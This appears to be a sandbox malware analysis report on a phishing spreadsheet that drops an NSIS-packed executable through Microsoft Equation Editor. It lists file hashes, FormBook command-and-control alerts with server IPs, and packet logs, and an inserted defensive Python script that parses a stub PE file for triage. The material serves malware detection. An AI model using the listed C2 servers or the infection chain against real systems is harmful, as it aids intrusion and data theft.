                                                  SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7441E635.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):498420
                                                  Entropy (8bit):0.6413684157450645
                                                  Encrypted:false
                                                  SSDEEP:384:AigmXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:o4XwBkNWZ3cjvmWa+VDO
                                                  MD5:C3B5DFF8B9EE127AD59D202832626865
                                                  SHA1:1A24D45E300CEAEF01DADD2D8F6EAF147DC6404F
                                                  SHA-256:EEDBFD16A5391148EE0D9436C7F279792F44287B5C1B209EC08F2C1FF9DF5540
                                                  SHA-512:D22486A87C5ADD06A9BC4F17801AC62847F36AF588C0E8D742FA7B694679BA3A44B1074E56C2E8FBA62392EE287F3A3359218257087BA6FFBEE18201DEA9D0B6
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8CED6B0B.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):6364
                                                  Entropy (8bit):7.935202367366306
                                                  Encrypted:false
                                                  SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                                  MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                                  SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                                  SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                                  SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A43ECEB2.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2B50451.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):42465
                                                  Entropy (8bit):7.979580180885764
                                                  Encrypted:false
                                                  SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                                  MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                                  SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                                  SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                                  SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFDE5B87.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):14828
                                                  Entropy (8bit):7.9434227607871355
                                                  Encrypted:false
                                                  SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                  MD5:58DD6AF7C438B638A88D107CC87009C7
                                                  SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                  SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                  SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D55D75BF.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):19408
                                                  Entropy (8bit):7.931403681362504
                                                  Encrypted:false
                                                  SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                  MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                  SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                  SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                  SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBA4EB36.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):14828
                                                  Entropy (8bit):7.9434227607871355
                                                  Encrypted:false
                                                  SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                  MD5:58DD6AF7C438B638A88D107CC87009C7
                                                  SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                  SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                  SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Temp\aeu4t4jz55fz
                                                  Process:C:\Users\Public\vbc.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):217157
                                                  Entropy (8bit):7.993801883377394
                                                  Encrypted:true
                                                  SSDEEP:3072:Z5rcoq1haO8cJOqo7x8js2mUulY0IE3eDrQ6vm3SqCc5Z3vTwZb9mAWw:MZWOr2mjKUuGrQXiqCwB0ZmAWw
                                                  MD5:8B2633BD722157554485B344223F7AB0
                                                  SHA1:9D052A1F1AD4B8B603FEB19F4B6538FD174A57E7
                                                  SHA-256:72D2A78BEE650F416FBC21B150AEACA6B209354EF04E440E866FB00E8F1E4CF4
                                                  SHA-512:B010278B624C56D4A657633EF42DCB7872A8B8E9E069C7CFF9E3F920263B0B2049D083F7E42BB3B79810EAFB333CFFD13471C8B393111297EE4D9EF38E34E993
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll
                                                  Process:C:\Users\Public\vbc.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):112640
                                                  Entropy (8bit):6.281670409201876
                                                  Encrypted:false
                                                  SSDEEP:1536:PxDm0dxnCMCN2flHUJ+0ttATO6o6HjJ33chbu3jwKTYvsu0f2T2R+usephtcOo4L:Z0YGJNP6ophaTweYIAs+use/pMIr9
                                                  MD5:A55CE7F1CF8DF8B06A15140A3E9E3F9B
                                                  SHA1:5F787501F1D8B2A93D1DF6D5C91CDE0DD2BA14CE
                                                  SHA-256:B6A12BC611F92D3D793CE5C3C9CFF8A906CA96BD6B1D5C0DA8EBF9080FF4428A
                                                  SHA-512:544823425EE681ACF6FA08CEB4A64840A16317573F2D6B6C6E4559199164D92C3F599521AEA245340CC6C756ED808C1F4E2C131239BFDC67EE9AE376AEF8BA4D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                  Joe Sandbox View:
                                                  • Filename: vbc.exe, Detection: malicious
                                                  C:\Users\user\AppData\Local\Temp\~DF1395079B79D3B049.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF927638A277FFF96D.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DFEABD3D7DAA0E0CDA.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:CDFV2 Encrypted
                                                  Category:dropped
                                                  Size (bytes):234184
                                                  Entropy (8bit):7.970312526321275
                                                  Encrypted:false
                                                  SSDEEP:6144:yxNNFbveUPpgiOrpvu5LaIXWjBUnsP9UYTO17ENuja:aNrbveei5uJWjTFFUQNv
                                                  MD5:2CAAB2292B282E6A5DEA1CF78F84924A
                                                  SHA1:86F37C31091B15CCA135490A84EB52027BB1A4DF
                                                  SHA-256:4C84124C87CD46CE58A7A8208AD1674C4A270793F9A6158E80FD28F96B3CC844
                                                  SHA-512:70590F55C98C31FB7B2A95CB6D6B63917E1FA0F868C3AF852A805D45CBB176356A4B1DC1431EF908C680821730D0D02948956C03388FCEE6FCF6BBD661D55733
                                                  Malicious:false
                                                  Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  C:\Users\user\AppData\Local\Temp\~DFFCF9EB155A244E75.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\Desktop\~$REMITTANCE ADVICE.xlsx
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):165
                                                  Entropy (8bit):1.4377382811115937
                                                  Encrypted:false
                                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                  Malicious:true
                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  C:\Users\Public\vbc.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Category:dropped
                                                  Size (bytes):305085
                                                  Entropy (8bit):7.93321683103638
                                                  Encrypted:false
                                                  SSDEEP:6144:rGiIouWvjqebPleWFVGwN5QwB0ZmAFd+DnMAlym7a:fzuebPlDVGwNh3AFPb
                                                  MD5:1624595E2354FF7BE9E7DC6DEF2ED69E
                                                  SHA1:1DCFAAE594E3690D3FEF5FD4DE855D02E9CBB2A5
                                                  SHA-256:4B50745E74FEA6FAA516B4D46B7C9FBE36FDAE2301B76EC940635D033707A2C8
                                                  SHA-512:AEBD6E6D28ECAB56E48B037836C2FFC573A8493B576EA3B59AC6932C6E782FC99AD1DA7A67A231830A2C4612C89E24F0E7F483D24080F29D6133D81C7207971E
                                                  Malicious:true
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................................................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
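The report identifies C:\Users\Public\vbc.exe as a Nullsoft self-extracting PE32 and gives its MD5/SHA1/SHA-256, and the preview dump shows the NSIS-typical .ndata section alongside .text/.rdata/.data/.rsrc. The script below is an added example, not part of the Joe Sandbox report, of how an analyst would triage such a drop offline: compute the same three hashes the report tabulates, walk the COFF header and section table, and flag NSIS indicators. The input is a constructed header-only PE stub built by build_stub_pe (an assumption for demonstration, not the real sample); the machine, timestamp (0x48EFCDCD) and characteristics (0x010F) values are copied from the report's raw PE header dump in the HTTP Packets section.

```python
"""Offline triage of a dropped PE: hashes, section table, NSIS indicators.
Added example; the PE parsed here is a constructed stub, not the real vbc.exe."""
import hashlib
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C


def hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA-256 as uppercase hex, the format of the report's columns."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
    }


def parse_pe(data: bytes) -> dict:
    """Return machine, link timestamp, characteristics and section names.

    Raises ValueError for anything that is not a well-formed PE so a truncated
    or non-PE drop is reported instead of silently accepted."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsect, timestamp, _, _, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    sect_off = e_lfanew + 24 + opt_size
    if sect_off + 40 * nsect > len(data):
        raise ValueError("section table runs past end of file")
    names = []
    for i in range(nsect):
        raw = data[sect_off + 40 * i: sect_off + 40 * i + 8]
        names.append(raw.split(b"\0", 1)[0].decode("ascii", "replace"))
    return {"machine": machine, "timestamp": timestamp,
            "characteristics": chars, "sections": names}


def nsis_indicators(pe: dict, data: bytes) -> list:
    """Heuristics for an NSIS self-extractor (the report's file type for vbc.exe):
    the .ndata section and the 'Nullsoft' marker in the installer overlay."""
    hits = []
    if ".ndata" in pe["sections"]:
        hits.append("section .ndata (NSIS data segment)")
    if b"Nullsoft" in data:
        hits.append("'Nullsoft' string present")
    return hits


def build_stub_pe(sections, with_nsis_marker=True) -> bytes:
    """Constructed minimal PE32 (headers only, no code) used as sample input."""
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 optional-header magic
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(sections),
                       0x48EFCDCD, 0, 0, len(opt), 0x010F)
    table = b"".join(name.encode().ljust(8, b"\0") + bytes(32) for name in sections)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> PE signature
    overlay = b"NullsoftInst" if with_nsis_marker else b""
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + overlay


def triage(data: bytes) -> dict:
    """Everything an analyst compares against the report's dropped-file entry."""
    pe = parse_pe(data)
    return {**hashes(data), "sections": pe["sections"],
            "nsis": nsis_indicators(pe, data)}


if __name__ == "__main__":
    sample = build_stub_pe([".text", ".rdata", ".data", ".ndata", ".rsrc"])
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

Run it against the real dropped file by replacing the stub with open(path, "rb").read(); the three hash strings should then equal the MD5/SHA1/SHA-256 shown for vbc.exe above, and the section list should contain .ndata.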

                                                  Static File Info

                                                  General

                                                  File type:CDFV2 Encrypted
                                                  Entropy (8bit):7.970312526321275
                                                  TrID:
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                  File name:REMITTANCE ADVICE.xlsx
                                                  File size:234184
                                                  MD5:2caab2292b282e6a5dea1cf78f84924a
                                                  SHA1:86f37c31091b15cca135490a84eb52027bb1a4df
                                                  SHA256:4c84124c87cd46ce58a7a8208ad1674c4a270793f9a6158e80fd28f96b3cc844
                                                  SHA512:70590f55c98c31fb7b2a95cb6d6b63917e1fa0f868c3af852a805d45cbb176356a4b1dc1431ef908c680821730d0d02948956c03388fcee6fcf6bbd661d55733
                                                  SSDEEP:6144:yxNNFbveUPpgiOrpvu5LaIXWjBUnsP9UYTO17ENuja:aNrbveei5uJWjTFFUQNv
                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                   Timestamp                 Protocol  SID      Message                               Src Port  Dst Port  Source IP       Dest IP
                                                   11/25/21-18:13:29.812628  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49168     80        192.168.2.22    34.102.136.180
                                                   11/25/21-18:13:29.812628  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49168     80        192.168.2.22    34.102.136.180
                                                   11/25/21-18:13:29.812628  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49168     80        192.168.2.22    34.102.136.180
                                                   11/25/21-18:13:29.930166  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80        49168     34.102.136.180  192.168.2.22
                                                   11/25/21-18:13:40.957479  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49171     80        192.168.2.22    156.234.44.48
                                                   11/25/21-18:13:40.957479  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49171     80        192.168.2.22    156.234.44.48
                                                   11/25/21-18:13:40.957479  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49171     80        192.168.2.22    156.234.44.48

                                                  Network Port Distribution

                                                  TCP Packets

                                                   Timestamp                            Src Port  Dst Port  Source IP       Dest IP
                                                   Nov 25, 2021 18:12:12.796477079 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:12.973809004 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:12.973917961 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:12.974230051 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.155354977 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.155431986 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.155488968 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.155539989 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.155603886 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.155635118 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.155755997 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.332767010 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.332989931 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.333447933 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.333520889 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.333550930 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.333568096 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.333571911 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.333620071 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.333641052 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.333655119 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.333659887 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.333698034 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.333719969 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.333738089 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.333740950 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.333770037 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511115074 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511159897 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511185884 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511209011 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511208057 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511234999 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511245012 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511261940 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511270046 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511286020 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511290073 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511312008 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511315107 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511333942 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511338949 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511351109 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511365891 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511378050 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511393070 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511405945 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511419058 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511442900 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511445045 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511456966 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511471033 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511480093 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511497021 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511507988 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511523008 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.511534929 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.511558056 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.513379097 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.688592911 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.688673973 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.688731909 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.688788891 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.688808918 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.688841105 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.688869953 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.688874006 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.688914061 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.688932896 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689018011 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689054966 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689057112 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689097881 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689111948 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689129114 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689146042 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689169884 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689176083 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689209938 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689229012 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689249039 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689260960 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689291000 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689304113 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689331055 CET  80        49167     192.210.173.90  192.168.2.22
